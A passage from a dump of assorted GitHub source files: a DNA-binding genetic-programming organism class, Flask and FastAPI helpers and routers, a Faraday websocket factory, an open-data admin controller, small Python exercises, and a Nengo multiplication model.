node\n \"right end\" on the matrix turn out to be the position of the current\n node on the sequence.\n \"\"\"\n n = len(dna_seq)\n dashed_line = [\"-\"] * n\n dotted_line_1 = [\"_\"] * n\n dotted_line_2 = [\"_\"] * n\n \n # for each node start\n for i in range(len(node_right_ends) - 1):\n \n # get sequence coordinates for the node\n start = node_right_ends[i]\n stop = node_right_ends[i+1]\n \n # get the node score and format it\n node_score = node_scores[i+1]\n node_score_str = \"{:.2f}\".format(node_score)\n \n # if this is a recognizer (even numbers on chain)\n if i % 2 == 0:\n \n # Detect a post 0-bp gap recognizer (special case)\n if start in cols_of_0_gaps:\n start -= 1\n \n # write recognizer placement\n for pos in range(start, stop):\n dashed_line[pos] = str(i)\n \n # write recognizer score\n for c in range(len(node_score_str)):\n if start + c < len(dotted_line_1): # avoid going out of the seq\n dotted_line_1[start + c] = node_score_str[c]\n \n # if this is a connector\n else:\n # get size of gap\n gap_size = stop - start\n \n # if the gap is large, the connector score is written in the middle\n if gap_size > len(node_score_str) + 1:\n right_shift = int(np.ceil((gap_size - len(node_score_str))/2))\n start += right_shift\n \n # More centered printing for small gaps\n else:\n start -= 2\n \n # write connector score\n for c in range(len(node_score_str)):\n if start + c < len(dotted_line_1): # avoid goin out of the seq\n dotted_line_2[start + c] = node_score_str[c]\n \n # print to stdout if required\n if print_out:\n print(dna_seq)\n print(\"\".join(dashed_line))\n print(\"\".join(dotted_line_1))\n print(\"\".join(dotted_line_2))\n \n # print to file if required\n if out_file != None:\n print(dna_seq, file=out_file)\n print(\"\".join(dashed_line), file=out_file)\n print(\"\".join(dotted_line_1), file=out_file)\n print(\"\".join(dotted_line_2), file=out_file)\n \n \n def get_random_connector(self) -> int:\n \"\"\"Returns the index of a random connector of the organism\n\n Returns:\n Integer between 0 and N-1 (both included), where N is the number of\n connectors the organism has.\n \"\"\"\n \n num_connectors = self.count_connectors()\n return random.randint(0, num_connectors - 1)\n\n\n def get_random_recognizer(self) -> int:\n \"\"\"Returns the index of a 
random recognizer of the organism\n\n Returns:\n Integer between 0 and N-1 (both included), where N is the number of\n recognizers the organism has.\n \"\"\"\n \n num_recognizers = self.count_recognizers()\n \n return random.randint(0, num_recognizers - 1)\n \n def break_chain(self, connector_to_break, bond_to_keep):\n \"\"\"Brakes an organism at the specified link and returns the resulting\n pair of chunks into a list. Each chunk is a dictionary with two keys:\n \"recognizers\" and \"connectors\".\n\n Parameters\n ----------\n connector_to_break : int\n Index of the connector where the chain will be broken.\n bond_to_keep : str\n If \"left\" the connector where the split occurs will stay linked to\n the left chunk, while its right bond will be broken (the opposite\n happens if its value is \"right\".\n\n Returns\n -------\n list\n A list with two elements, which are the two chunks of the splitted\n chain, both represented as a dictionary with two keys:\n \"recognizers\" and \"connectors\" (which point to lists of recognizers\n or connectors, respectively).\n\n \"\"\"\n \n # Recognizers of left and right chunks\n L_recognizers = self.recognizers[:connector_to_break + 1]\n R_recognizers = self.recognizers[connector_to_break + 1:]\n \n # Connectors of left and right chunks\n if bond_to_keep==\"left\":\n L_connectors = self.connectors[:connector_to_break + 1]\n R_connectors = self.connectors[connector_to_break + 1:]\n elif bond_to_keep==\"right\":\n L_connectors = self.connectors[:connector_to_break]\n R_connectors = self.connectors[connector_to_break:]\n else:\n raise Exception('bond_to_keep needs to be \"left\" or \"right\".')\n \n L_chunk = {\"recognizers\": L_recognizers, \"connectors\": L_connectors}\n R_chunk = {\"recognizers\": R_recognizers, \"connectors\": R_connectors}\n \n L_chunk_copy = copy.deepcopy(L_chunk)\n R_chunk_copy = copy.deepcopy(R_chunk)\n \n return [L_chunk_copy, R_chunk_copy]\n \n def set_connectors(self, connectors_list):\n \"\"\"Set the connectors of the organism to be those provided in the input\n list.\n \"\"\"\n \n self.connectors = connectors_list\n \n def set_recognizers(self, recognizers_list):\n \"\"\"Set the recognizers of the organism to be those provided in the\n input list.\n \"\"\"\n \n self.recognizers = recognizers_list\n\n def print(self) -> None:\n \"\"\"Prints the whole tree data structure\n \"\"\"\n \n print(\"***** Organism {} *****\".format(self._id))\n for i in range(len(self.recognizers) - 1):\n self.recognizers[i].print()\n self.connectors[i].print()\n self.recognizers[-1].print()\n\n def export(self, filename: str) -> None:\n \"\"\"Exports the whole tree data structure\n\n Args:\n filename: Name of the file to export the organism\n \"\"\"\n organism_file = open(filename, \"w+\")\n organism_file.write(\"***** Organism {} *****\".format(self._id))\n \n for i in range(len(self.recognizers) - 1):\n self.recognizers[i].export(organism_file)\n self.connectors[i].export(organism_file)\n self.recognizers[-1].export(organism_file)\n\n organism_file.write(\"\\n\")\n organism_file.close()\n\n def export_results(self, a_dna: list, filename: str) -> None:\n \"\"\"Exports the binding profile of the organism against each of the \n DNA sequences provided as a list\n\n Args:\n filename: Name of the file to export sequences\n a_dna: list fo sequences to export\n\n \"\"\"\n \n ofile = open(filename, \"w\")\n # for every DNA sequence\n for s_dna in a_dna:\n # call fitness evaluation for sequence with file printing option\n sfit = 
self.get_placement(s_dna.lower(), traceback=True,\n print_out = False, out_file = ofile)\n ofile.close()\n\n\n def print_result(self, s_dna: str) -> None:\n \"\"\"Prints the binding profile of the organism against the \n provided DNA sequence \n \n Args:\n s_dna: DNA sequence to export\n\n Returns:\n DNA sequence and binding sites of the organisms recognizer\n \"\"\"\n\n s_dna = s_dna.lower()\n\n # call fitness evaluation for sequence\n sfit = self.get_placement(s_dna.lower(), traceback=True,\n print_out = True)\n","repo_name":"ErillLab/TF_GP","sub_path":"src/objects/organism_object.py","file_name":"organism_object.py","file_ext":"py","file_size_in_byte":60086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73481064453","text":"\nfrom decimal import Decimal\nfrom json import dumps\n\nfrom flask import current_app, request\n\n\ndef serialize(obj):\n \"\"\"JSON serializer for objects not serializable by default orjson dumps\"\"\"\n\n if isinstance(obj, Decimal):\n return str(obj)\n\n return obj.to_json()\n\n\ndef is_json_client() -> bool:\n try:\n return \"application/json\" in request.headers.get(\"Accept\")\n except TypeError:\n return False\n\n\ndef json_res(code=200, **kwargs):\n\n kwargs[\"http_status_code\"] = code\n\n response = current_app.response_class(\n response=dumps(kwargs, default=serialize),\n status=int(code),\n mimetype=\"application/json\",\n )\n\n return response","repo_name":"ibraheemalayan/ENCS3340-AI-PathFinder-WebApp","sub_path":"finder_app/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"30468366734","text":"'''\nAuthor: Ashutosh Srivastava\nPython3 solution\n'''\n\nimport math\ndef sieve_of_erasthosthenes(arr,n):\n for i in range(2,int(math.sqrt(n))+1):\n if(arr[i] != False):\n for j in range(i*i,n+1,i):\n arr[j]=False\n return arr\n\nfor _ in range(int(input())):\n data=int(input())\n list_=[True for i in range(data+1)]\n arr=sieve_of_erasthosthenes(list_,data)\n arr[1]=False\n for i in range(0,data):\n if(arr[i] and arr[data-i]):\n print(i,data-i)\n break\n","repo_name":"ashutosh65000/Coding-Questions","sub_path":"even_number_as_a_sum_of_two_prime_number.py","file_name":"even_number_as_a_sum_of_two_prime_number.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14873524742","text":"import re\r\n\r\nr = open('DualBlades.txt','r')\r\ns = r.read()\r\nw = open('DualBladesRaw.txt', 'w+')\r\n\r\nst = re.findall(r\"[\\da-z/<>]{3,}\",s)\r\nj = \"\"\r\nfor i in st:\r\n\ti = re.findall(r\">[0-9]{2,}\",i)\r\n\tj = ''.join(i)\r\n\tj = j[1:]\r\n\tprint(j)\r\n\tw.write('\\n' + j)\r\n\r\nprint(len(st))\r\nr.close()\r\nw.close()\r\n","repo_name":"Lintik/MHWDB","sub_path":"DualBlades/DualBladesRaw.py3","file_name":"DualBladesRaw.py3","file_ext":"py3","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"42603804085","text":"# display the strings for the beginning of Mary had a little lamb\nprint(\"Mary had a little lamb.\")\nprint(\"Its fleece was white as {}.\".format('snow')) # insert 'snow' into the string\nprint(\"And everywhere that Mary went.\")\n# make a row of 10 periods\nprint(\".\" * 10)\n\n# declare a bunch of string variables\nend1 = \"C\"\nend2 = \"h\"\nend3 = \"e\"\nend4 = 
\"e\"\nend5 = \"s\"\nend6 = \"e\"\nend7 = \"B\"\nend8 = \"u\"\nend9 = \"r\"\nend10 = \"g\"\nend11 = \"e\"\nend12 = \"r\"\n\n# display the words made by adding all the new variables together\n# the end=' ' makes a space between the words instead of a line break\nprint(end1 + end2 + end3 + end4 + end5 + end6, end=' ')\nprint(end7 + end8 + end9 + end10 + end11 + end12)\n","repo_name":"kristinbrooks/lpthw","sub_path":"src/ex7.py","file_name":"ex7.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29432896970","text":"import json\nimport logging\nimport itsdangerous\n\nimport Cookie\nimport server.utils\nimport server.utils.logger\nfrom collections import defaultdict\nfrom Queue import Queue, Empty\n\nfrom twisted.internet import reactor\n# from twisted.python import log\n\nfrom autobahn.twisted.websocket import (\n WebSocketServerFactory,\n WebSocketServerProtocol\n)\n\nfrom server.models import Workspace\n\nlogger = server.utils.logger.get_logger(__name__)\nchanges_queue = Queue()\n\n\nclass BroadcastServerProtocol(WebSocketServerProtocol):\n\n def onConnect(self, request):\n protocol, headers = None, {}\n # see if there already is a cookie set ..\n logger.debug('Websocket request {0}'.format(request))\n if 'cookie' in request.headers:\n try:\n cookie = Cookie.SimpleCookie()\n cookie.load(str(request.headers['cookie']))\n except Cookie.CookieError:\n pass\n return (protocol, headers)\n\n def onMessage(self, payload, is_binary):\n from server.web import app\n \"\"\"\n We only support JOIN and LEAVE workspace messages.\n When authentication is implemented we need to verify\n that the user can join the selected workspace.\n When authentication is implemented we need to reply\n the client if the join failed.\n \"\"\"\n if not is_binary:\n message = json.loads(payload)\n if message['action'] == 'JOIN_WORKSPACE':\n if 'workspace' not in message or 'token' not in message:\n logger.warning('Invalid join workspace message: '\n '{}'.format(message))\n self.sendClose()\n return\n signer = itsdangerous.TimestampSigner(app.config['SECRET_KEY'],\n salt=\"websocket\")\n try:\n workspace_id = signer.unsign(message['token'], max_age=60)\n except itsdangerous.BadData as e:\n self.sendClose()\n logger.warning('Invalid websocket token for workspace '\n '{}'.format(message['workspace']))\n logger.exception(e)\n else:\n with app.app_context():\n workspace = Workspace.query.get(int(workspace_id))\n if workspace.name != message['workspace']:\n logger.warning(\n 'Trying to join workspace {} with token of '\n 'workspace {}. 
Rejecting.'.format(\n message['workspace'], workspace.name\n ))\n self.sendClose()\n else:\n self.factory.join_workspace(\n self, message['workspace'])\n if message['action'] == 'LEAVE_WORKSPACE':\n self.factory.leave_workspace(self, message['workspace'])\n\n def connectionLost(self, reason):\n WebSocketServerProtocol.connectionLost(self, reason)\n self.factory.unregister(self)\n\n def sendServerStatus(self, redirectUrl=None, redirectAfter=0):\n self.sendHtml('This is a websocket port.')\n\n\nclass WorkspaceServerFactory(WebSocketServerFactory):\n \"\"\"\n This factory uses the changes_queue to broadcast\n message via websockets.\n\n Any message put on that queue will be sent to clients.\n\n Clients subscribe to workspace channels.\n This factory will broadcast message to clients subscribed\n on workspace.\n\n The message in the queue must contain the workspace.\n \"\"\"\n def __init__(self, url):\n WebSocketServerFactory.__init__(self, url)\n # this dict has a key for each channel\n # values are list of clients.\n self.workspace_clients = defaultdict(list)\n self.tick()\n\n def tick(self):\n \"\"\"\n Uses changes_queue to broadcast messages to clients.\n broadcast method knowns each client workspace.\n \"\"\"\n try:\n msg = changes_queue.get_nowait()\n self.broadcast(json.dumps(msg))\n except Empty:\n pass\n reactor.callLater(0.5, self.tick)\n\n def join_workspace(self, client, workspace):\n logger.debug('Join workspace {0}'.format(workspace))\n if client not in self.workspace_clients[workspace]:\n logger.debug(\"registered client {}\".format(client.peer))\n self.workspace_clients[workspace].append(client)\n\n def leave_workspace(self, client, workspace_name):\n logger.debug('Leave workspace {0}'.format(workspace_name))\n self.workspace_clients[workspace_name].remove(client)\n\n def unregister(self, client_to_unregister):\n \"\"\"\n Search for the client_to_unregister in all workspaces\n \"\"\"\n for workspace_name, clients in self.workspace_clients.items():\n for client in clients:\n if client == client_to_unregister:\n logger.debug(\"unregistered client from workspace {0}\".format(workspace_name))\n self.leave_workspace(client, workspace_name)\n return\n\n def broadcast(self, msg):\n logger.debug(\"broadcasting prepared message '{}' ..\".format(msg))\n prepared_msg = json.loads(self.prepareMessage(msg).payload)\n for client in self.workspace_clients[prepared_msg['workspace']]:\n reactor.callFromThread(client.sendPreparedMessage, self.prepareMessage(msg))\n logger.debug(\"prepared message sent to {}\".format(client.peer))\n","repo_name":"rsumnerz/faraday","sub_path":"server/websocket_factories.py","file_name":"websocket_factories.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"13061317559","text":"'''\nnote :\n\n'''\n\n###################################################################################\nimport os\nimport dir_info\ndi = dir_info.Info()\nmain_dir = di.main_dir\nprep_dir = di.prep_dir \t\t\t\t\t# \\1_preprocessing\nmodel_dir = di.model_dir \t\t\t\t# \\2_model\nmodule_dir = di.module_dir \t\t\t\t# \\module\nfacility_dir = di.facility_dir\t\t\t# \\facility\nplot_dir = di.plot_dir\t\t\t\t\t# \\plot\ncluster_dir = di.cluster_dir \t\t\t# \\0_temp_dir(clustering)\nfacility_list = self.facility_list\t\t#['업무시설', '판매 및 숙박시설', '문화시설', 
'교육시설']\n","repo_name":"KIM-HANJOO/main_hydrogen","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74916191494","text":"import os\nimport sys\nfrom galileo.tests.utils import (\n zk_server,\n zk_path,\n)\nfrom galileo.framework.python.service import start_service\n\nshard_index, shard_count = 0, 1\nif len(sys.argv) > 1:\n shard_index = int(sys.argv[1])\nif len(sys.argv) > 2:\n shard_count = int(sys.argv[2])\n\nbase_dir = os.path.dirname(os.path.abspath(__file__))\ndata_dir = os.path.realpath(os.path.join(base_dir, '../../testdata'))\nstart_service(data_dir,\n zk_server=zk_server,\n zk_path=zk_path,\n shard_index=shard_index,\n shard_count=shard_count,\n daemon=False)\n","repo_name":"JDGalileo/galileo","sub_path":"galileo/tests/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":143,"dataset":"github-code","pt":"44"} +{"seq_id":"12294223620","text":"from services.api.app.domain.services.player_projection_service import PlayerProjectionService, create_player_projection_service\nfrom fastapi import Depends\n\nfrom services.api.app.domain.services.roster_projection_service import RosterProjectionService, create_roster_projection_service\nfrom .api_router import APIRouter\n\nrouter = APIRouter(prefix=\"/projection/league/{league_id}\")\n\n\n@router.get(\"/player/{player_id}\")\nasync def player(\n league_id: str,\n player_id: str,\n service: PlayerProjectionService = Depends(create_player_projection_service)\n):\n return service.get_projection(league_id, player_id)\n\n\n@router.get(\"/roster/{roster_id}\")\nasync def roster(\n league_id: str,\n roster_id: str,\n service: RosterProjectionService = Depends(create_roster_projection_service),\n):\n return service.get_projection(league_id, roster_id)\n","repo_name":"mdryden/110yards","sub_path":"services/api/app/routers/projection_router.py","file_name":"projection_router.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"35390294707","text":"## Problem: Given a linked list, remove all the duplicates.\n\n## Solution: We can simply maintain a HashSet of the visited nodes and remove a node if its data is ever repeated.\n## Time and Space Complexity: O(N) and O(N)\n\nclass ListNode:\n def __init__(self, val = 0, next = None):\n self.val = val\n self.next = next\n\ndef removeDups(head: ListNode) -> ListNode:\n ''' Given a singly LL, remove all duplicate nodes'''\n\n temp = ListNode()\n temp.next = head\n seen = set()\n\n ## Edge cases\n if head == None or head.next == None:\n return head\n\n while temp.next != None:\n if temp.next.val in seen:\n toDelete = temp.next\n temp.next = temp.next.next\n del toDelete\n else:\n seen.add(temp.next.val)\n \n return head\n\n## Follow-up: Remove duplicates no space -> we have to sacrifice time.\n\ndef removeDuplicateNoSpace(head: ListNode) -> ListNode:\n temp = head\n \n while temp != None:\n lookahead = temp\n while lookahead.next != None:\n if lookahead.next.val == temp.val:\n lookahead.next = lookahead.next.next\n else:\n lookahead = lookahead.next\n temp = temp.next\n \n return 
head\n","repo_name":"raopg/algorithm-solutions","sub_path":"CTCI/Linked_Lists/removeDups.py","file_name":"removeDups.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"22066060186","text":"import logging\n\nfrom flask import jsonify, current_app\nfrom flask_restx import Namespace, Resource, reqparse\n\nfrom app import oidc\nfrom app.controller.Decorator import isAdmin\n\napi = Namespace(name='admin', description=\"API de gestion des services d'administration (API sécurisée)\")\n\narguments_pastell_controller = reqparse.RequestParser()\narguments_pastell_controller.add_argument('id_e',\n help=\"identifiant de l'entitie dans pastell pour lequel on souhaite effectuer l'action\")\n\narguments_udata_controller = reqparse.RequestParser()\narguments_udata_controller.add_argument('annee', help=\"Année de generation\")\narguments_udata_controller.add_argument('siren', help=\"siren de l'organisme\")\n\narguments_annee_controller = reqparse.RequestParser()\narguments_annee_controller.add_argument('annee', help=\"Année de generation\")\n\n\n@api.route('/solr/clear')\nclass AdminCtrl(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def get(self):\n from app.tasks.utils import solr_clear_all\n solr_clear_all()\n return jsonify({\"statut\": 'ok'})\n\n\n@api.route('/solr/delete/')\nclass AdminSolrDeleteCtrl(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def delete(self, id_publication):\n from app.tasks.utils import solr_connexion\n try:\n solr = solr_connexion()\n solr.delete(q=\"publication_id:\" + str(id_publication))\n except Exception as e:\n logging.exception(\"Erreur lors suppression dans solr de l'id_publication: %s\" % id_publication)\n raise e\n return jsonify({\"statut\": 'ok'})\n\n\n\n@api.route('/publier/rejeu')\nclass AdminPulicationRejeu(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.publication import creation_publication_task\n import os\n for entry in os.scandir(current_app.config['DIRECTORY_RELAUNCH']):\n if entry.name.endswith(\".zip\"):\n creation_publication_task.delay(os.path.join(current_app.config['DIRECTORY_RELAUNCH'], entry.name))\n\n return jsonify({\n \"statut\": 'demande de relance des fichiers zip présent dans le dossier de relance (taches asynchrone)'})\n\n@api.route('/publier/datagouv/deliberation')\nclass AdminPulicationDelibSCDL(Resource):\n @api.expect(arguments_annee_controller)\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.datagouv_tasks import generation_and_publication_scdl\n args = arguments_annee_controller.parse_args()\n annee = args['annee']\n generation_and_publication_scdl.delay('1', annee)\n return jsonify({\n \"statut\": 'demande de generation et publication du SCDL deliberation sur data gouv effectuée (taches asynchrone)'})\n\n\n@api.route('/publier/datagouv/budget')\nclass AdminPulicationBudgetSCDL(Resource):\n @api.expect(arguments_annee_controller)\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.datagouv_tasks import generation_and_publication_scdl\n args = 
arguments_annee_controller.parse_args()\n annee = args['annee']\n generation_and_publication_scdl.delay('5', annee)\n return jsonify({\n \"statut\": 'demande de generation et publication du SCDL budget sur data gouv effectuée (taches asynchrone)'})\n\n\n@api.route('/publier/datagouv/decpHisto')\nclass AdminPulicationDecpHisto(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.marches_tasks import generation_marche_histo\n generation_marche_histo.delay()\n return jsonify({\n \"statut\": \"demande de generation et publication du decp des années historique à partir de 2014 (taches asynchrone)\"})\n\n\n@api.route('/publier/datagouv/decpHisto/annee')\nclass AdminPulicationDecpHistoAnnee(Resource):\n @api.expect(arguments_annee_controller)\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.marches_tasks import generation_marche_annee\n args = arguments_annee_controller.parse_args()\n annee = args['annee']\n generation_marche_annee.delay(str(annee))\n return jsonify(\n {\"statut\": \"demande de generation et publication du decp pour l'année en parametre (taches asynchrone)\"})\n\n\n@api.route('/publier/datagouv/decp')\nclass AdminPublicationDecp(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.marches_tasks import generation_marche\n generation_marche.delay()\n return jsonify(\n {\"statut\": \"demande de generation et publication du decp pour l'année courante (taches asynchrone)\"})\n\n\n\n@api.route('/publier/udata/decp')\nclass AdminUdataDecpCtrl(Resource):\n @api.expect(arguments_udata_controller)\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.udata_tasks import publication_udata_decp\n args = arguments_udata_controller.parse_args()\n siren = args['siren']\n annee = args['annee']\n publication_udata_decp.delay(siren, annee)\n return jsonify(\n {\"statut\": 'demande de déclenchement udata decp (taches asynchrone)'})\n\n\n@api.route('/publier/udata/budget')\nclass AdminUdataBudgetCtrl(Resource):\n @api.expect(arguments_udata_controller)\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.udata_tasks import publication_udata_budget\n args = arguments_udata_controller.parse_args()\n siren = args['siren']\n annee = args['annee']\n publication_udata_budget.delay(siren, annee)\n return jsonify(\n {\"statut\": 'demande de déclenchement udata budget (taches asynchrone)'})\n\n\n@api.route('/publier/udata/deliberation')\nclass AdminUdataDeliberationCtrl(Resource):\n @api.expect(arguments_udata_controller)\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.udata_tasks import publication_udata_deliberation\n args = arguments_udata_controller.parse_args()\n siren = args['siren']\n annee = args['annee']\n publication_udata_deliberation.delay(siren, annee)\n return jsonify(\n {\"statut\": 'demande de déclenchement udata deliberation (taches asynchrone)'})\n\n\n@api.route('/publier/udata/all')\nclass AdminUdataAllCtrl(Resource):\n @api.expect(arguments_annee_controller)\n @api.response(200, 'Success')\n 
@oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.udata_tasks import publication_udata\n args = arguments_annee_controller.parse_args()\n annee = args['annee']\n publication_udata.delay(annee)\n return jsonify(\n {\"statut\": 'demande de déclenchement udata budget, deliberation & decp (taches asynchrone)'})\n\n\n@api.route('/publier/udata/decpHisto')\nclass AdminUdataPublicationDecpHisto(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.udata_tasks import publication_udata_decp_histo\n publication_udata_decp_histo.delay()\n return jsonify({\n \"statut\": \"demande de generation et publication du decp des années historique à partir de 2014 vers udata (taches asynchrone)\"})\n\n\n@api.route('/publication/republier/all/')\n@api.doc(params={'etat': '1 =publie, 0=non, 2=en-cours, 3=en-erreur'})\nclass PublicationRepublierCtrl(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self, etat):\n from app.tasks.publication import republier_all_acte_task\n republier_all_acte_task.delay(etat)\n return jsonify(\n {\"statut\": \"ETAT:\" +str(etat)+ '- demande de republication prise en compte (taches asynchrone)'})\n\n@api.route('/publication/republier//')\n@api.doc(params={'etat': '1 =publie, 0=non, 2=en-cours, 3=en-erreur'})\nclass PublicationRepublierSirenCtrl(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self, siren, etat):\n from app.tasks.publication import republier_actes_pour_siren_task\n republier_actes_pour_siren_task.delay(siren, etat)\n return jsonify(\n {\"statut\": \"ETAT:\" +str(etat)+ ' SIREN: '+str(siren)+'- demande de republication prise en compte (taches asynchrone)'})\n\n\n@api.route('/parametrage/valorisation')\nclass AdminValorisation(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def post(self):\n from app.tasks.parametrage_tasks import valorisation_all_nic_denomination\n valorisation_all_nic_denomination.delay()\n return jsonify(\n {\"statut\": 'Valorisation des nic et denomination'})\n\n\n@api.route('/test/isAdmin')\nclass AdminIsAdmin(Resource):\n @api.response(200, 'Success')\n @oidc.accept_token(require_token=True, scopes_required=['openid'])\n @isAdmin\n def get(self):\n return jsonify(\n {\"rep\": 'Welcome admin'})\n","repo_name":"megalis-bretagne/opendata-extraction","sub_path":"app/controller/AdminCtrl.py","file_name":"AdminCtrl.py","file_ext":"py","file_size_in_byte":10085,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"9974276247","text":"# # Nengo Example: Multiplication\n\n# This example will show you how to multiply two values. The model\n# architecture can be thought of as a combination of the combining demo and\n# the squaring demo. 
Essentially, we project both inputs independently into a\n# 2D space, and then decode a nonlinear transformation of that space (the\n# product of the first and second vector elements).\n\n# Create the model object\nimport nengo\nmodel = nengo.Network(label='Multiplication')\nwith model:\n # Create 4 ensembles of leaky integrate-and-fire neurons\n A = nengo.Ensemble(100, dimensions=1, radius=10, label=\"A\")\n B = nengo.Ensemble(100, dimensions=1, radius=10, label=\"B\")\n\n # Radius on this ensemble is ~sqrt(10^2+10^2)\n combined = nengo.Ensemble(224, dimensions=2, radius=15, label=\"combined\")\n\n prod = nengo.Ensemble(100, dimensions=1, radius=20, label=\"product\")\n\n# These next two lines make all of the encoders in the Combined population\n# point at the corners of the cube. This improves the quality of the\n# computation. Note the number of neurons is assumed to be divisible by 4\nimport numpy as np\n# Comment out the line below for 'normal' encoders\ncombined.encoders = np.tile(\n [[1,1],[-1,1],[1,-1],[-1,-1]],\n (combined.n_neurons // 4, 1))\n\nwith model:\n # Create a piecewise step function for input\n inputA = nengo.Node([0], label=\"input A\")\n inputB = nengo.Node([0], label=\"input B\")\n\n # Connect the input nodes to the appropriate ensembles\n nengo.Connection(inputA, A)\n nengo.Connection(inputB, B)\n\n # Connect input ensembles A and B to the 2D combined ensemble\n nengo.Connection(A, combined[0])\n nengo.Connection(B, combined[1])\n\n # Define a function that computes the multiplication of two inputs\n def product(x):\n return x[0] * x[1]\n\n # Connect the combined ensemble to the output ensemble D\n nengo.Connection(combined, prod, function=product)\n\n nengo.Probe(inputA)\n nengo.Probe(inputB,)\n nengo.Probe(A, synapse=0.01)\n nengo.Probe(B, synapse=0.01)\n nengo.Probe(combined, synapse=0.01)\n nengo.Probe(prod, synapse=0.01)\n nengo.Probe(combined, 'spikes')\n\n\nimport nengo_gui\ngui = nengo_gui.Config()\ngui[model].scale = 1.7291542213316193\ngui[model].offset = -12.174626639948599,130.63578585201708\ngui[A].pos = 175.000, 50.000\ngui[A].scale = 1.000\ngui[B].pos = 175.000, 125.000\ngui[B].scale = 1.000\ngui[combined].pos = 300.000, 87.500\ngui[combined].scale = 1.000\ngui[prod].pos = 425.000, 87.500\ngui[prod].scale = 1.000\ngui[inputA].pos = 50.000, 50.000\ngui[inputA].scale = 1.000\ngui[inputB].pos = 50.000, 125.000\ngui[inputB].scale = 1.000\n","repo_name":"ctn-archive/nengo_gui_2014","sub_path":"nengo_gui/scripts/simple demos/multiplication.py","file_name":"multiplication.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"22714428291","text":"from abstract_adapt_operation import *\n\nclass SpectralErrorWork(DimensionAdaptivity):\n\n\tdef __init__(self, dim, tol, init_multiindex, max_level, level_to_nodes):\n\t\t\n\t\tself._dim \t\t\t\t= dim\n\t\tself._tol \t\t\t\t= tol\n\t\tself._init_multiindex \t= init_multiindex\n\t\tself._max_level \t\t= max_level\n\t\tself._level_to_nodes \t= level_to_nodes\n\n\t\tself._eta = 0.\n\n\t\tself._O \t\t\t\t= OrderedDict()\n\t\tself._A \t\t\t\t= OrderedDict() \n\t\tself._local_error \t\t= OrderedDict()\n\t\tself._key_O \t\t\t= 0\n\t\tself._key_A \t\t\t= 0\n\t\tself._key_local_error \t= 0\n\n\t\tself._multiindex_set \t= []\n\t\tself._init_no_points \t= 0\n\t\tself._stop_adaption \t= False\n\n\t\tself._local_basis_global \t= None\n\t\tself._local_basis_local \t= OrderedDict()\n\n\tdef _get_norm_delta(self, 
